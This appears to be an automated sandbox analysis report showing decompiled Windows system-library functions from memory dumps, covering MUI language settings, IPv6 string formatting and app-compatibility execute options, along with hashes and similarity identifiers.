Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00E28788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E28788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00E28460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00E0E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00E2718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00E28460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00E2718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00E28460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00E28460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00E28460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00E2718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00E0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00E02340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00E1E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00E0E2A8(_t322,  &_v68, _v16);
								if(E00E25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00E1E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00E0E2A8(_t322,  &_v68, _t236);
								if(E00E25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00E2718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00E0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00E02340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00E1E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00E0E2A8(_v12,  &_v68, _v16);
							if(E00E25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00E1E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00E0E2A8(_t322,  &_v68, _t269);
							if(E00E25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00E2718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00E0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00E02340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00E1E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00E0E2A8(_v12,  &_v68, _v16);
						if(E00E25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00E1E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00E0E2A8(_t322,  &_v68, _t296);
						if(E00E25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00E0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00e28788
0x00e28788
0x00e28791
0x00e28794
0x00e28798
0x00e2879b
0x00e2879e
0x00e287a1
0x00e287a4
0x00e287a7
0x00e287aa
0x00e287af
0x00e71ad3
0x00e28b0a
0x00e28b0d
0x00e28b13
0x00e28b19
0x00e28b1f
0x00e28b25
0x00e28b2b
0x00e28b31
0x00e28b37
0x00e28b3d
0x00e28b46
0x00e28b46
0x00e287c6
0x00e287d0
0x00e71ae0
0x00e71ae6
0x00e71af8
0x00e71af8
0x00e71afd
0x00e71afe
0x00e71b01
0x00e71b06
0x00e71b06
0x00e287d6
0x00e287f2
0x00e287f7
0x00e28807
0x00e2880a
0x00e2880f
0x00e28810
0x00e28813
0x00e28818
0x00e28818
0x00e2882c
0x00e28831
0x00e28838
0x00e28908
0x00e28920
0x00e289f0
0x00e28a08
0x00e28af6
0x00e28af6
0x00e28af8
0x00e28afb
0x00e71beb
0x00e71beb
0x00e28b04
0x00e71bf8
0x00e71c0e
0x00e71c13
0x00e71c16
0x00e71c16
0x00e71bf8
0x00000000
0x00e28b04
0x00e28a0e
0x00e28a11
0x00e28a14
0x00e28a15
0x00e28a18
0x00e28a22
0x00e28b59
0x00e28a28
0x00e28a3c
0x00e28a3c
0x00e28a42
0x00e71bb0
0x00e71b11
0x00e71b11
0x00000000
0x00e28a48
0x00e28a51
0x00e28a5b
0x00e28a5e
0x00e28a61
0x00e28a69
0x00e28a69
0x00e28a6d
0x00000000
0x00000000
0x00e28a74
0x00e28a7c
0x00e28a7d
0x00e28a91
0x00e28a93
0x00e28a93
0x00e28a98
0x00e28a9b
0x00e28aa1
0x00e28aa1
0x00e28aa4
0x00e28aaa
0x00e28ab1
0x00e28ac5
0x00e28ac7
0x00e28ac7
0x00e28ac5
0x00e28ace
0x00e71bc9
0x00e71bce
0x00e71bd2
0x00e71bd2
0x00e28ad8
0x00e28aeb
0x00e28aeb
0x00e28af0
0x00e28af4
0x00000000
0x00e28af4
0x00e28a42
0x00e28926
0x00e28929
0x00e2892c
0x00e2892d
0x00e28930
0x00e28935
0x00e2893a
0x00e28b51
0x00e28940
0x00e28954
0x00e28954
0x00e2895a
0x00e71b63
0x00000000
0x00e28960
0x00e28969
0x00e28973
0x00e28976
0x00e28979
0x00e2897e
0x00e28981
0x00e28981
0x00e28986
0x00000000
0x00000000
0x00e71b6e
0x00e71b74
0x00e71b7b
0x00e71b8f
0x00e71b91
0x00e71b91
0x00e71b99
0x00e71b9c
0x00e71ba2
0x00e71ba2
0x00e2898c
0x00e28992
0x00e28999
0x00e289ad
0x00e71ba8
0x00e71ba8
0x00e289ad
0x00e289b6
0x00e289c8
0x00e289cd
0x00e289d0
0x00e289d0
0x00e289d6
0x00e289e8
0x00e289e8
0x00e289ed
0x00000000
0x00e289ed
0x00e2895a
0x00e2883e
0x00e28841
0x00e28844
0x00e28845
0x00e28848
0x00e2884d
0x00e28852
0x00e28b49
0x00e28858
0x00e2886c
0x00e2886c
0x00e28872
0x00e71b0e
0x00000000
0x00e28878
0x00e28881
0x00e2888b
0x00e2888e
0x00e28891
0x00e28896
0x00e28899
0x00e28899
0x00e2889e
0x00000000
0x00000000
0x00e71b21
0x00e71b27
0x00e71b2e
0x00e71b42
0x00e71b44
0x00e71b44
0x00e71b4c
0x00e71b4f
0x00e71b55
0x00e71b55
0x00e288a4
0x00e288aa
0x00e288b1
0x00e288c5
0x00e71b5b
0x00e71b5b
0x00e288c5
0x00e288ce
0x00e288e0
0x00e288e5
0x00e288e8
0x00e288e8
0x00e288ee
0x00e28900
0x00e28900
0x00e28905
0x00000000
0x00e28905

APIs

_wcspbrk.LIBCMT ref: 00E28891
_wcspbrk.LIBCMT ref: 00E28979
_wcspbrk.LIBCMT ref: 00E28A61
_wcspbrk.LIBCMT ref: 00E28A9B
_wcspbrk.LIBCMT ref: 00E71B9C

Strings

Kernel-MUI-Number-Allowed, xrefs: 00E287E6
Kernel-MUI-Language-Allowed, xrefs: 00E28827
Kernel-MUI-Language-SKU, xrefs: 00E289FC
WindowsExcludedProcs, xrefs: 00E287C1
Kernel-MUI-Language-Disallowed, xrefs: 00E28914

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 7d2342126ec2d10b81d24ab1f6cc9d99f2f2d98479cda0933a296f7a55882892
Instruction ID: 29dbc7ca3de3b65179681427c2cf697b6e6bfe972d04a7fe92277f44b503a2f5
Opcode Fuzzy Hash: 7d2342126ec2d10b81d24ab1f6cc9d99f2f2d98479cda0933a296f7a55882892
Instruction Fuzzy Hash: 43F1F6B2D00219EFCB11DF98DA819EEB7F8FF08304F14646AE505B7251EB359A85DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E413CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00E413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00E37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xe02926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00E37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xe09cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00E37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00E37707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00E37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00E37707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00e413d5
0x00e413d9
0x00e413dc
0x00e413de
0x00e413e1
0x00e413e8
0x00e413ee
0x00e6e8fd
0x00000000
0x00e6e921
0x00e6e921
0x00e6e928
0x00e6e982
0x00e6e98a
0x00000000
0x00e6e99a
0x00e6e99e
0x00e6e9a3
0x00e6e9a8
0x00e6e9b9
0x00e6e978
0x00000000
0x00e6e978
0x00e6e98a
0x00e6e92a
0x00e6e931
0x00e6e944
0x00e6e944
0x00e6e950
0x00e6e954
0x00e6e959
0x00e6e95e
0x00e6e963
0x00e6e970
0x00000000
0x00e6e975
0x00e6e93b
0x00e6e980
0x00000000
0x00e6e980
0x00e6e942
0x00e6e94b
0x00000000
0x00e6e94b
0x00000000
0x00e6e942
0x00e413f4
0x00e413f4
0x00e413f9
0x00e413fc
0x00e413ff
0x00e41406
0x00e6e9cc
0x00e6e9d2
0x00e6e9d2
0x00e6e9cc
0x00e4140c
0x00e41411
0x00e41431
0x00e4143a
0x00e4143c
0x00e4143f
0x00e4143f
0x00e41442
0x00e41447
0x00e414a8
0x00e414ac
0x00e6e9e2
0x00e6e9e7
0x00e6e9ec
0x00e6ea05
0x00e6ea05
0x00000000
0x00e41449
0x00000000
0x00e41449
0x00e4144c
0x00e41459
0x00e41462
0x00e41469
0x00e4146a
0x00e41470
0x00e41473
0x00e41476
0x00e41476
0x00e41490
0x00e41495
0x00e4138e
0x00e41390
0x00e41397
0x00e41398
0x00e41399
0x00e413a1
0x00e413a4
0x00e413a4
0x00e41498
0x00e4149c
0x00e4149f
0x00e414a2
0x00000000
0x00000000
0x00e414a4
0x00000000
0x00e414a4
0x00e41413
0x00e41415
0x00e41416
0x00e41419
0x00e4141c
0x00e41422
0x00e413b7
0x00e413bc
0x00e413bf
0x00e413bf
0x00e413c2
0x00e41424
0x00e41424
0x00e41424
0x00e41427
0x00e4142b
0x00e4142c
0x00e4142c
0x00e4142c
0x00000000
0x00e4141c
0x00e41411

APIs

___swprintf_l.LIBCMT ref: 00E4146B
___swprintf_l.LIBCMT ref: 00E41490
___swprintf_l.LIBCMT ref: 00E6E970

Strings

::%hs%u.%u.%u.%u, xrefs: 00E6E967
::ffff:0:%u.%u.%u.%u, xrefs: 00E6E9B0
:%u.%u.%u.%u, xrefs: 00E6E9F4
ffff:, xrefs: 00E6E94B

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 0ce39bc5c0df05b5f618a31d17d9088a9a9541f26a7aacde5efe6806b4dad769
Instruction ID: b2b34233c0a66454b6825b910a213e0ddecc7eb1fd6c55f2dabac68d5ae0f2a1
Opcode Fuzzy Hash: 0ce39bc5c0df05b5f618a31d17d9088a9a9541f26a7aacde5efe6806b4dad769
Instruction Fuzzy Hash: 3C6139B1900655A6CF34DF59D8808BEBBF5EFD4304B14D4ADE4E567681D330AA80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E37EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E37EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xee2088; // 0x774cb321
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00E37F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00E53F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00E0DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xee4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00E53F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00E10D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00E53F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00E18375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00E53F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00E7E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00E53F92();
					_t38 = 1;
					L2:
					return E00E0E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00e37f08
0x00e37f0f
0x00e37f12
0x00e37f1b
0x00e37f31
0x00e53ead
0x00e53eb4
0x00000000
0x00000000
0x00e53eba
0x00e53ecd
0x00e53ed2
0x00e53ee1
0x00e53ee7
0x00e53eec
0x00e53f12
0x00e53f18
0x00e53f1a
0x00000000
0x00000000
0x00e53f20
0x00e53f26
0x00e53f28
0x00000000
0x00000000
0x00e53f2e
0x00e53f30
0x00000000
0x00000000
0x00e53f3a
0x00e53f3b
0x00e53f53
0x00e53f64
0x00e53f69
0x00e53f6c
0x00e53f6d
0x00e53f6f
0x00e5e304
0x00e5e30f
0x00e5e315
0x00e5e31e
0x00e5e321
0x00e5e327
0x00e5e329
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5e32f
0x00e5e32f
